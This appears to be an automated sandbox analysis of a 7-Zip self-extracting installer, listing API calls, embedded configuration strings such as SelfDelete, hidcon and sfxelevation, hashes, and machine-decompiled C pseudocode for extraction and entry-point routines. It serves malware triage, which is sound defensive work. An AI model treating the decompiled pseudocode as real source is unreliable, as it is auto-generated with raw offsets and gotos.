Part of subcall function 00402107: SetWindowPos.USER32(00000000,00000000,?,004053C6,00000000,00000000,00000004), ref: 00402167
Part of subcall function 00402107: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402177
Part of subcall function 00402107: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402184
Part of subcall function 00402107: DispatchMessageW.USER32 ref: 0040218E
Part of subcall function 00402107: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,004053C6,?,00000000), ref: 00402197

GetVersionExW.KERNEL32(?,?,00000000), ref: 004053D7
MessageBoxA.USER32 ref: 00406CA7

Part of subcall function 00410F2D: ??2@YAPAXI@Z.MSVCRT ref: 00410F35

Part of subcall function 00403F58: LoadLibraryA.KERNEL32(kernel32,?,00000000,00000000), ref: 00403F69
Part of subcall function 00403F58: #17.COMCTL32(?,00000000,00000000), ref: 00403F74
Part of subcall function 00403F58: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00403FF5
Part of subcall function 00403F58: wsprintfW.USER32 ref: 00404009

GetCommandLineW.KERNEL32(?,0041BCC0,?,00000000), ref: 00405463

Part of subcall function 004032EC: ??3@YAXPAX@Z.MSVCRT ref: 00403363
Part of subcall function 004032EC: ??3@YAXPAX@Z.MSVCRT ref: 0040337F
Part of subcall function 004032EC: ??3@YAXPAX@Z.MSVCRT ref: 00403387
Part of subcall function 004032EC: ??3@YAXPAX@Z.MSVCRT ref: 004033F5

lstrlenW.KERNEL32(?,00000000,00000000), ref: 00405487

Part of subcall function 00403B4F: ??3@YAXPAX@Z.MSVCRT ref: 00403BB7
Part of subcall function 00403B4F: ??3@YAXPAX@Z.MSVCRT ref: 00403BC2
Part of subcall function 00403B4F: ??3@YAXPAX@Z.MSVCRT ref: 00403BCA

GetCommandLineW.KERNEL32(00000001), ref: 004054BE

Part of subcall function 00403001: wcsncpy.MSVCRT ref: 0040302F
Part of subcall function 00403001: ??3@YAXPAX@Z.MSVCRT ref: 0040303A

wsprintfW.USER32 ref: 004054E6

Part of subcall function 004043AC: lstrlenW.KERNEL32(?,00000001,?,?,?,00405517,?,sfxlang,SfxVarSystemLanguage,?,00000001,?), ref: 004043F1
Part of subcall function 004043AC: lstrlenW.KERNEL32(?), ref: 004043F6

_wtol.MSVCRT(-00000002), ref: 00405528
??3@YAXPAX@Z.MSVCRT ref: 00405577
??3@YAXPAX@Z.MSVCRT ref: 00405588
??3@YAXPAX@Z.MSVCRT ref: 00405590
GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208), ref: 004055FC
_wtol.MSVCRT(-00000002), ref: 00405722
??2@YAPAXI@Z.MSVCRT ref: 004058B1
??3@YAXPAX@Z.MSVCRT ref: 0040593A
??3@YAXPAX@Z.MSVCRT ref: 004059B2
??3@YAXPAX@Z.MSVCRT ref: 004059CE
??3@YAXPAX@Z.MSVCRT ref: 00405A0C
wsprintfW.USER32 ref: 00405A36
_wtol.MSVCRT(?), ref: 00405C59

Part of subcall function 004040AE: lstrlenW.KERNEL32(cf@,00000000,?,?,004040F5,00000000,00000000,00406663,?,waitall,00000000,00000000), ref: 004040BB
Part of subcall function 004040AE: lstrlenW.KERNEL32(?), ref: 004040C4
Part of subcall function 004040AE: _wcsnicmp.MSVCRT ref: 004040D0

??3@YAXPAX@Z.MSVCRT ref: 00405D24
??3@YAXPAX@Z.MSVCRT ref: 00405D6F
??3@YAXPAX@Z.MSVCRT ref: 00405D77
??3@YAXPAX@Z.MSVCRT ref: 00405D98
??3@YAXPAX@Z.MSVCRT ref: 00405DF1
??3@YAXPAX@Z.MSVCRT ref: 00405DF9
GetCommandLineW.KERNEL32(?,?,?,?,?), ref: 00405E63
??3@YAXPAX@Z.MSVCRT ref: 00405EDF
??3@YAXPAX@Z.MSVCRT ref: 00405EE7
??3@YAXPAX@Z.MSVCRT ref: 00405EEF
??3@YAXPAX@Z.MSVCRT ref: 00405EF7
??3@YAXPAX@Z.MSVCRT ref: 00405EFF
GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,?,00000000,00000020), ref: 00405F0B
SetProcessWorkingSetSize.KERNEL32(00000000), ref: 00405F12
??3@YAXPAX@Z.MSVCRT ref: 00405F2F
??3@YAXPAX@Z.MSVCRT ref: 00405F37
??3@YAXPAX@Z.MSVCRT ref: 00405F3F
??3@YAXPAX@Z.MSVCRT ref: 00405F47
??3@YAXPAX@Z.MSVCRT ref: 00405F63
??3@YAXPAX@Z.MSVCRT ref: 00405F6B
??3@YAXPAX@Z.MSVCRT ref: 00405F73
??3@YAXPAX@Z.MSVCRT ref: 00405F7B
??3@YAXPAX@Z.MSVCRT ref: 00405FF0
??3@YAXPAX@Z.MSVCRT ref: 00406011
??3@YAXPAX@Z.MSVCRT ref: 0040609B
CoInitialize.OLE32(00000000), ref: 004060C8
lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004060F8

Part of subcall function 0040AA10: memcpy.MSVCRT ref: 0040AA4B

_wtol.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406215
??3@YAXPAX@Z.MSVCRT ref: 00406237
??3@YAXPAX@Z.MSVCRT ref: 0040627E
GetKeyState.USER32(00000010), ref: 004062CC
??3@YAXPAX@Z.MSVCRT ref: 0040641D
??3@YAXPAX@Z.MSVCRT ref: 00406445
??3@YAXPAX@Z.MSVCRT ref: 0040644D
??3@YAXPAX@Z.MSVCRT ref: 00406469
??3@YAXPAX@Z.MSVCRT ref: 00406471
??3@YAXPAX@Z.MSVCRT ref: 0040649D
??3@YAXPAX@Z.MSVCRT ref: 004064D9
SetCurrentDirectoryW.KERNELBASE(02EC5520,0041E754), ref: 0040650C
??3@YAXPAX@Z.MSVCRT ref: 0040654D
??3@YAXPAX@Z.MSVCRT ref: 00406555
??3@YAXPAX@Z.MSVCRT ref: 00406617
??3@YAXPAX@Z.MSVCRT ref: 00406622
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,setup.exe,?,00000000,?,?), ref: 0040662C
??3@YAXPAX@Z.MSVCRT ref: 004066E1
??3@YAXPAX@Z.MSVCRT ref: 004066E9
_wtol.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040677B
SetCurrentDirectoryW.KERNELBASE(00000000,?,?), ref: 00406925
??3@YAXPAX@Z.MSVCRT ref: 0040697C
??3@YAXPAX@Z.MSVCRT ref: 00406987
??3@YAXPAX@Z.MSVCRT ref: 00406992
??3@YAXPAX@Z.MSVCRT ref: 004069B6
??3@YAXPAX@Z.MSVCRT ref: 00406A01
??3@YAXPAX@Z.MSVCRT ref: 00406A09
??3@YAXPAX@Z.MSVCRT ref: 00406A11
??3@YAXPAX@Z.MSVCRT ref: 00406A19

Part of subcall function 00404B6A: GetCommandLineW.KERNEL32(?,00000000,?), ref: 00404B8B
Part of subcall function 00404B6A: ??3@YAXPAX@Z.MSVCRT ref: 00404C4E
Part of subcall function 00404B6A: ??3@YAXPAX@Z.MSVCRT ref: 00404C56
Part of subcall function 00404B6A: ??3@YAXPAX@Z.MSVCRT ref: 00404C5E
Part of subcall function 00404B6A: ??3@YAXPAX@Z.MSVCRT ref: 00404C66
Part of subcall function 00404B6A: ??3@YAXPAX@Z.MSVCRT ref: 00404C6E
Part of subcall function 00404B6A: ??3@YAXPAX@Z.MSVCRT ref: 00404C76
Part of subcall function 00404B6A: ??3@YAXPAX@Z.MSVCRT ref: 00404C7E
Part of subcall function 00404B6A: ??3@YAXPAX@Z.MSVCRT ref: 00404C86
Part of subcall function 00404B6A: ??3@YAXPAX@Z.MSVCRT ref: 00404C8E
Part of subcall function 00404B6A: ??3@YAXPAX@Z.MSVCRT ref: 00404C96

??3@YAXPAX@Z.MSVCRT ref: 00406A2E
??3@YAXPAX@Z.MSVCRT ref: 00406A36
??3@YAXPAX@Z.MSVCRT ref: 0040642B

Part of subcall function 00408E03: wvsprintfW.USER32(?,00000000,?), ref: 00408E27
Part of subcall function 00408E03: GetLastError.KERNEL32 ref: 00408E38
Part of subcall function 00408E03: FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000000,00000000,0000000F), ref: 00408E60
Part of subcall function 00408E03: FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000000,00000000,0000000F), ref: 00408E75
Part of subcall function 00408E03: lstrlenW.KERNEL32(?), ref: 00408E88
Part of subcall function 00408E03: lstrlenW.KERNEL32(00000000), ref: 00408E8F
Part of subcall function 00408E03: ??2@YAPAXI@Z.MSVCRT ref: 00408EA4
Part of subcall function 00408E03: lstrcpyW.KERNEL32 ref: 00408EBA
Part of subcall function 00408E03: lstrcpyW.KERNEL32 ref: 00408ECC
Part of subcall function 00408E03: ??3@YAXPAX@Z.MSVCRT ref: 00408ED5
Part of subcall function 00408E03: LocalFree.KERNEL32(00000000), ref: 00408EDF

??3@YAXPAX@Z.MSVCRT ref: 00406A53
??3@YAXPAX@Z.MSVCRT ref: 00406A5B
??3@YAXPAX@Z.MSVCRT ref: 00406A63
??3@YAXPAX@Z.MSVCRT ref: 00406A6B
??3@YAXPAX@Z.MSVCRT ref: 00406A73
??3@YAXPAX@Z.MSVCRT ref: 00406A91
SetLastError.KERNEL32(00000000,00000000,?,?), ref: 00406A9A
??3@YAXPAX@Z.MSVCRT ref: 00406AB4
??3@YAXPAX@Z.MSVCRT ref: 00406ABC
??3@YAXPAX@Z.MSVCRT ref: 00406AC4
??3@YAXPAX@Z.MSVCRT ref: 00406ACC
??3@YAXPAX@Z.MSVCRT ref: 00406AD4
??3@YAXPAX@Z.MSVCRT ref: 00406ADC
??3@YAXPAX@Z.MSVCRT ref: 00406AE4
??3@YAXPAX@Z.MSVCRT ref: 00406B03
??3@YAXPAX@Z.MSVCRT ref: 00406B0B
??3@YAXPAX@Z.MSVCRT ref: 00406B13
??3@YAXPAX@Z.MSVCRT ref: 00406B1B
SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,00000000,?,?), ref: 00406B53
??3@YAXPAX@Z.MSVCRT ref: 00406B7D
??3@YAXPAX@Z.MSVCRT ref: 00406C56
??3@YAXPAX@Z.MSVCRT ref: 00406C5E
??3@YAXPAX@Z.MSVCRT ref: 00406C75
??3@YAXPAX@Z.MSVCRT ref: 00406C86
??3@YAXPAX@Z.MSVCRT ref: 00406C8E

Strings

FinishMessage, xrefs: 00406BAA
TA, xrefs: 00406A21
SfxVarSystemPlatform, xrefs: 004054B0
Delete, xrefs: 00406B62
InstallPath, xrefs: 004061D9
GUIMode, xrefs: 00405B7E
del, xrefs: 004067B2
x86, xrefs: 00405494, 004067D6
setup.exe, xrefs: 004065E2, 004065E7, 0040663F
ExecuteParameters, xrefs: 00406878
sfxwaitall, xrefs: 0040559E
SfxVarCmdLine0, xrefs: 004054C1
`A, xrefs: 004057E4
SetEnvironment, xrefs: 00405FA1, 00405FA9, 00405FFC
MiscFlags, xrefs: 00405BC4
sfxversion, xrefs: 0040555C
BeginPrompt, xrefs: 0040629C
SfxVarCmdLine2, xrefs: 00405A75, 00405E15
x64, xrefs: 0040680F
SfxString%d, xrefs: 00405A30
SelfDelete, xrefs: 00405C03, 00406C24
sfxconfig, xrefs: 00405781, 0040595F
SfxAuthor, xrefs: 004060D2
SfxVarCmdLine1, xrefs: 00405DB9
bpt, xrefs: 00405C6A
A, xrefs: 004056EC
shc, xrefs: 00406790
" -, xrefs: 00405E7F
7-Zip SFX, xrefs: 00406C9B
GUIFlags, xrefs: 00405BA1
sfxelevation, xrefs: 004055BA, 00405E7A
7ZipSfx.%03x, xrefs: 00406485
nowait, xrefs: 00406714
sfxlang, xrefs: 0040550C
Shortcut, xrefs: 00406B3A
ExecuteFile, xrefs: 0040638C, 0040639E
forcenowait, xrefs: 00406738
OverwriteMode, xrefs: 00405B3B
RunProgram, xrefs: 004063BA, 004063CC
HelpText, xrefs: 0040603B
AutoInstall, xrefs: 00406308, 0040635E, 004066C1
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 00406CA0
amd64, xrefs: 004067FC
123456789ABCDEFGHJKMNPQRSTUVWXYZ, xrefs: 00406127
TA, xrefs: 004061E7
hidcon, xrefs: 004066F6
BeginPromptTimeout, xrefs: 00405C83, 00406202
xA, xrefs: 00405866
i386, xrefs: 004067E9
SfxVarModulePlatform, xrefs: 00405499
lA, xrefs: 004057EE
SfxVarSystemLanguage, xrefs: 00405502
waitall, xrefs: 00406658

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$lstrlen$Message_wtol$CommandCurrentLineWindow$??2@Directorywsprintf$ErrorFileFormatLastModuleProcessTimerlstrcpy$?_set_new_handler@@AttributesCreateDesktopDispatchFolderFreeHandleInitializeKillLibraryLoadLocalNamePathRectSizeSpecialStateVersionWorking_wcsnicmpmemcpywcsncpywvsprintf
String ID: " -$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$SfxString%d$SfxVarCmdLine0$SfxVarCmdLine1$SfxVarCmdLine2$SfxVarModulePlatform$SfxVarSystemLanguage$SfxVarSystemPlatform$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$TA$TA$`A$amd64$bpt$del$forcenowait$hidcon$i386$lA$nowait$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxversion$sfxwaitall$shc$waitall$x64$x86$xA$A
API String ID: 4098105823-3965490674
Opcode ID: 5832e83d08cb4eaa1190bef38595a1411f8bd5e31eed15cf3249c2af739d8731
Instruction ID: 34c8fb84d35725d03b2e6abcfd72154efad795144c72cd9f02e2f71dcefc5efa
Opcode Fuzzy Hash: 5832e83d08cb4eaa1190bef38595a1411f8bd5e31eed15cf3249c2af739d8731
Instruction Fuzzy Hash: ECE2B071900208AADB25AB61DC46BEF3768EF11318F14443FF905B61E1EB7D9990CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00403117, Relevance: 6.0, APIs: 4, Instructions: 41
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403117(WCHAR* _a4, FILETIME* _a8) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t10;
				signed int _t11;
				intOrPtr _t12;

				_t10 = FindFirstFileW(_a4,  &_v596); // executed
				if(_t10 != 0xffffffff) {
					_t11 = FindClose(_t10);
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						_t12 =  *0x41e738; // 0x1
						if(_t12 != 0) {
							if(_t12 != 2 || CompareFileTime( &(_v596.ftLastWriteTime), _a8) >= 0) {
								return 1;
							} else {
								goto L5;
							}
						} else {
							L5:
							return E004030E5(_a4);
						}
					} else {
						SetLastError(0x10);
						return _t11 | 0xffffffff;
					}
				} else {
					return 0;
				}
			}

0x0040312a
0x00403133
0x0040313a
0x00403147
0x00403156
0x0040315d
0x0040316d
0x00403187
0x00000000
0x00000000
0x00000000
0x0040315f
0x0040315f
0x00403169
0x00403169
0x00403149
0x0040314b
0x00403155
0x00403155
0x00403135
0x00403138
0x00403138

APIs

FindFirstFileW.KERNELBASE(00000000,?), ref: 0040312A
FindClose.KERNEL32(00000000), ref: 0040313A
SetLastError.KERNEL32(00000010), ref: 0040314B

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseErrorFileFirstLast
String ID:
API String ID: 4020440971-0
Opcode ID: 766f9727a412e46ce12f4434cb9d8cecb0df1ce33caedddd55f862e7f7d0b0ea
Instruction ID: 370a1090e9fb1a8ad9882005d40d7ba9ad39883a516b7b84788935c795a99c90
Opcode Fuzzy Hash: 766f9727a412e46ce12f4434cb9d8cecb0df1ce33caedddd55f862e7f7d0b0ea
Instruction Fuzzy Hash: BEF0CD30600108ABDF206F30EC4DB9A3FACAB0436EF008A75E826E41E0D778CA519A0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401878, Relevance: 21.3, APIs: 14, Instructions: 311
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00401878(intOrPtr* _a4, long _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v16;
				signed int _v24;
				char _v28;
				long _v32;
				long _v36;
				short _v42;
				signed short _v44;
				long _v52;
				short _v58;
				char _v60;
				struct _SYSTEMTIME _v76;
				void* __ebx;
				intOrPtr* _t110;
				intOrPtr* _t112;
				long _t113;
				long _t116;
				long _t118;
				intOrPtr* _t128;
				intOrPtr* _t131;
				intOrPtr* _t137;
				signed int _t139;
				intOrPtr* _t144;
				intOrPtr _t146;
				intOrPtr _t149;
				signed int _t158;
				intOrPtr* _t159;
				intOrPtr _t160;
				intOrPtr* _t161;
				intOrPtr _t165;
				intOrPtr* _t173;
				long _t179;
				intOrPtr* _t222;
				long _t224;
				intOrPtr* _t227;
				intOrPtr* _t229;
				intOrPtr _t232;
				void* _t235;

				_t179 = 0;
				_t235 =  *0x41e7d8 - _t179; // 0x0
				if(_t235 == 0) {
					_t229 = _a4;
					_t222 = _t229 + 0x24;
					_t110 =  *_t222;
					_a4 = _t222;
					__eflags = _t110;
					if(_t110 != 0) {
						 *((intOrPtr*)( *_t110 + 8))(_t110);
						 *_t222 = 0;
					}
					_v60 = 0;
					_v58 = 0;
					_t112 =  *((intOrPtr*)(_t229 + 0xc));
					_v52 = _t179;
					_t113 =  *((intOrPtr*)( *_t112 + 0x18))(_t112, _a8, 3,  &_v60);
					__eflags = _t113 - _t179;
					if(_t113 == _t179) {
						E00410F2D(_t113,  &_v16);
						__eflags = _v60 - _t179;
						if(_v60 == _t179) {
							L53:
							_t116 =  *((intOrPtr*)( *_t229 + 0x1c))(_t229, 0x64);
							_push(_v16);
							L00418674();
							E00410B42( &_v60);
							_t118 = _t116;
							goto L54;
						}
						__eflags = _v60 - 8;
						if(_v60 != 8) {
							goto L53;
						}
						E00411391(_t179,  &_v16, _v52);
						E00411391(_t179, _t229 + 0x28,  *((intOrPtr*)(E004112F8( &_v28, _t229 + 0x10,  &_v16))));
						_push(_v28);
						L00418674();
						__eflags = _a16 - _t179;
						if(_a16 != _t179) {
							 *_a12 = _t179;
							L52:
							_push(_v16);
							L00418674();
							E00410B42( &_v60);
							_t118 = 0;
							goto L54;
						}
						_v44 = 0;
						_v42 = 0;
						_t128 =  *((intOrPtr*)(_t229 + 0xc));
						_v36 = _t179;
						_t224 =  *((intOrPtr*)( *_t128 + 0x18))(_t128, _a8, 9,  &_v44);
						__eflags = _t224 - _t179;
						if(_t224 == _t179) {
							__eflags = _v44 - _t179;
							if(_v44 != _t179) {
								__eflags = _v44 - 0x13;
								if(_v44 == 0x13) {
									 *((intOrPtr*)(_t229 + 0x40)) = _v36;
									L20:
									_t131 =  *((intOrPtr*)(_t229 + 0xc));
									_t224 =  *((intOrPtr*)( *_t131 + 0x18))(_t131, _a8, 6,  &_v44);
									__eflags = _t224 - _t179;
									if(_t224 != _t179) {
										goto L11;
									}
									__eflags = _v36 - _t179;
									_t219 =  &_v44;
									 *(_t229 + 0x3c) = 0 | _v36 != _t179;
									_t137 =  *((intOrPtr*)(_t229 + 0xc));
									_t224 =  *((intOrPtr*)( *_t137 + 0x18))(_t137, _a8, 0xc,  &_v44);
									__eflags = _t224 - _t179;
									if(_t224 != _t179) {
										goto L11;
									}
									_t139 = _v44 & 0x0000ffff;
									__eflags = _t139 - _t179;
									if(_t139 == _t179) {
										GetLocalTime( &_v76);
										_t225 = _t229 + 0x34;
										SystemTimeToFileTime( &_v76, _t229 + 0x34);
										L27:
										__eflags =  *(_t229 + 0x3c) - _t179;
										if(__eflags == 0) {
											_t144 = E00403117( *((intOrPtr*)(_t229 + 0x28)), _t225); // executed
											__eflags = _t144 - 0xffffffff;
											if(_t144 == 0xffffffff) {
												_t146 =  *((intOrPtr*)( *_t229 + 0x20))(_t229, 0x69, GetLastError());
												L17:
												_t179 = _t146;
												L18:
												E00410B42( &_v44);
												_push(_v16);
												L00418674();
												goto L6;
											}
											__eflags = _t144 - 1;
											if(_t144 == 1) {
												 *_a12 = _t179;
												goto L18;
											}
											_push(0x18);
											L00418686();
											__eflags = _t144 - _t179;
											if(_t144 == _t179) {
												_t227 = 0;
												__eflags = 0;
											} else {
												 *((intOrPtr*)(_t144 + 4)) = _t179;
												 *_t144 = 0x41a5d4;
												 *(_t144 + 8) =  *(_t144 + 8) | 0xffffffff;
												_t227 = _t144;
											}
											 *((intOrPtr*)(_t229 + 0x20)) = _t227;
											__eflags = _t227 - _t179;
											if(_t227 != _t179) {
												 *((intOrPtr*)( *_t227 + 4))(_t227);
											}
											_t149 =  *((intOrPtr*)(_t229 + 0x20));
											 *((intOrPtr*)(_t149 + 0x10)) = _t179;
											 *((intOrPtr*)(_t149 + 0x14)) = _t179;
											__eflags = E004109AE( *((intOrPtr*)(_t229 + 0x28)), 1);
											if(__eflags != 0) {
												L48:
												E00408F80(_a4, _t227);
												 *_a12 = _t227;
												E00410B42( &_v44);
												goto L52;
											} else {
												_a8 = GetLastError();
												E00410F51( &_v28, _t219, __eflags, _t229 + 0x28);
												_t158 = E004020E4(__eflags,  &_v28);
												__eflags = _t158 - _t179;
												if(__eflags >= 0) {
													_v24 = _t158;
													 *((short*)(_v28 + _t158 * 2)) = 0;
													_t159 = E0040341E(_v28, __eflags, _v28);
													__eflags = _t159;
													if(_t159 != 0) {
														_t160 =  *((intOrPtr*)(_t229 + 0x20));
														 *((intOrPtr*)(_t160 + 0x10)) = _t179;
														 *((intOrPtr*)(_t160 + 0x14)) = _t179;
														_t161 = E004109AE( *((intOrPtr*)(_t229 + 0x28)), 1);
														__eflags = _t161;
														if(_t161 != 0) {
															_push(_v28);
															L00418674();
															goto L48;
														}
														_a8 =  *_t229;
														_t165 =  *((intOrPtr*)(_a8 + 0x20))(_t229, 0x6a, GetLastError());
														L40:
														_push(_v28);
														_t232 = _t165;
														L00418674();
														__eflags = _t227 - _t179;
														if(_t227 != _t179) {
															 *((intOrPtr*)( *_t227 + 8))(_t227);
														}
														E00410B42( &_v44);
														_push(_v16);
														L00418674();
														_t179 = _t232;
														goto L6;
													}
													_t165 =  *((intOrPtr*)( *_t229 + 0x1c))(_t229, 0x68);
													goto L40;
												}
												_t165 =  *((intOrPtr*)( *_t229 + 0x20))(_t229, 0x6a, _a8);
												goto L40;
											}
										}
										_t173 = E0040341E(_t219, __eflags,  *((intOrPtr*)(_t229 + 0x28)));
										__eflags = _t173;
										if(_t173 != 0) {
											goto L18;
										}
										_push(0x68);
										L16:
										_t146 =  *((intOrPtr*)( *_t229 + 0x1c))(_t229);
										goto L17;
									}
									__eflags = _t139 - 0x40;
									if(_t139 == 0x40) {
										_t225 = _t229 + 0x34;
										_t225->dwLowDateTime = _v36;
										_t225->dwHighDateTime = _v32;
										goto L27;
									}
									_push(0x66);
									goto L16;
								}
								_push(0x65);
								goto L16;
							}
							 *((intOrPtr*)(_t229 + 0x40)) = _t179;
							goto L20;
						}
						L11:
						E00410B42( &_v44);
						_push(_v16);
						L00418674();
						_t179 = _t224;
						goto L6;
					} else {
						_t179 = _t113;
						L6:
						E00410B42( &_v60);
						_t118 = _t179;
						L54:
						return _t118;
					}
				}
				return 0x80004004;
			}

0x0040187f
0x00401881
0x00401887
0x00401894
0x00401898
0x0040189b
0x0040189d
0x004018a0
0x004018a2
0x004018a7
0x004018aa
0x004018aa
0x004018b7
0x004018bb
0x004018bf
0x004018c2
0x004018c8
0x004018cb
0x004018cd
0x004018e3
0x004018e8
0x004018ec
0x00401bb8
0x00401bbd
0x00401bc0
0x00401bc5
0x00401bce
0x00401bd3
0x00000000
0x00401bd3
0x004018f2
0x004018f7
0x00000000
0x00000000
0x00401903
0x00401921
0x00401926
0x00401929
0x0040192f
0x00401932
0x00401ba1
0x00401ba3
0x00401ba3
0x00401ba6
0x00401baf
0x00401bb4
0x00000000
0x00401bb4
0x00401943
0x00401947
0x0040194b
0x0040194e
0x00401957
0x00401959
0x0040195b
0x00401975
0x00401979
0x00401980
0x00401985
0x004019aa
0x004019ad
0x004019ad
0x004019bf
0x004019c1
0x004019c3
0x00000000
0x00000000
0x004019c7
0x004019cb
0x004019d7
0x004019da
0x004019e3
0x004019e5
0x004019e7
0x00000000
0x00000000
0x004019ed
0x004019f1
0x004019f3
0x00401a12
0x00401a18
0x00401a20
0x00401a26
0x00401a26
0x00401a29
0x00401a48
0x00401a4f
0x00401a52
0x00401b96
0x0040198f
0x0040198f
0x00401991
0x00401994
0x00401999
0x0040199c
0x00000000
0x004019a1
0x00401a58
0x00401a5b
0x00401b83
0x00000000
0x00401b83
0x00401a61
0x00401a63
0x00401a69
0x00401a6b
0x00401a7e
0x00401a7e
0x00401a6d
0x00401a6d
0x00401a70
0x00401a76
0x00401a7a
0x00401a7a
0x00401a80
0x00401a83
0x00401a85
0x00401a8a
0x00401a8a
0x00401a90
0x00401a99
0x00401a9c
0x00401aa4
0x00401aa6
0x00401b68
0x00401b6c
0x00401b77
0x00401b79
0x00000000
0x00401aac
0x00401ab2
0x00401abc
0x00401ac5
0x00401acb
0x00401acd
0x00401b0c
0x00401b0f
0x00401b16
0x00401b1c
0x00401b1e
0x00401b2d
0x00401b36
0x00401b39
0x00401b3c
0x00401b41
0x00401b43
0x00401b5f
0x00401b62
0x00000000
0x00401b67
0x00401b47
0x00401b57
0x00401ada
0x00401ada
0x00401add
0x00401adf
0x00401ae5
0x00401ae7
0x00401aec
0x00401aec
0x00401af2
0x00401af7
0x00401afa
0x00401b00
0x00000000
0x00401b00
0x00401b25
0x00000000
0x00401b25
0x00401ad7
0x00000000
0x00401ad7
0x00401aa6
0x00401a2e
0x00401a34
0x00401a36
0x00000000
0x00000000
0x00401a3c
0x00401989
0x0040198c
0x00000000
0x0040198c
0x004019f5
0x004019f8
0x00401a01
0x00401a04
0x00401a09
0x00000000
0x00401a09
0x004019fa
0x00000000
0x004019fa
0x00401987
0x00000000
0x00401987
0x0040197b
0x00000000
0x0040197b
0x0040195d
0x00401960
0x00401965
0x00401968
0x0040196e
0x00000000
0x004018cf
0x004018cf
0x004018d1
0x004018d4
0x004018d9
0x00401bd5
0x00000000
0x00401bd6
0x004018cd
0x00000000

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6acb698c705118c51b34c4cee3c456786baecf65d4b0f7876e082155530591f6
Instruction ID: f891026cfacc3aeb8c01887b7607a10ad07c1e05622898397e8355d9778f82b4
Opcode Fuzzy Hash: 6acb698c705118c51b34c4cee3c456786baecf65d4b0f7876e082155530591f6
Instruction Fuzzy Hash: 87B16171900205AFCB10EFA5C8859EEB7B5FF48314F14452FF546AB2A1EB78E981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041887F, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 72%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x41c6c0);
				_push(0x418a10);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x422aa8 =  *0x422aa8 | 0xffffffff;
				 *0x422aac =  *0x422aac | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x420a7c; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x420a78; // 0x0
				 *_t24 = _t47;
				 *0x422aa4 = _adjust_fdiv;
				_t27 = E00418A0B( *_adjust_fdiv);
				_t60 =  *0x41e6a0; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E00418A08);
					_pop(_t47);
				}
